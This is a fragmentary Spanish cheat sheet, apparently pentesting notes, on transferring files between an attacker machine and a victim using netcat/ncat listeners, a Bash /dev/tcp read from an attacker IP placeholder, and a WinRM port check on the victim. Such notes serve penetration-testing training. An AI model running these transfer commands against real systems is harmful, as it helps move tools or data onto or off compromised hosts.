nc -l -p 8000 --recv-only > archivo.exe
-recv-only: Cierra la conexión una vez finalizada la transferencia de archivos.{nc|ncat} {opciones} {ip_atacante} 8000 < archivo.exe
nc -q 0: Cierra la conexión una vez que termine la transferencia.ncat --send-only: Termina la conexión cuando se agote la entrada.sudo nc -l -p 443 -q 0 < archivo.exe
sudo ncat -l -p 443 --send-only < archivo.exe
nc {ip} 443 > archivo.exe
ncat {ip} 443 --recv-only > archivo.exe
/dev/tcp en Bash):cat < /dev/tcp/{ip}/{puerto} > archivo.exe
En caso de que no existan servicios como HTTP, HTTPS o SMB, podemos usar WinRM para realizar operaciones de transferencia de archivos.
Test-NetConnection -ComputerName {nombre_maquina_victima} -Port 5985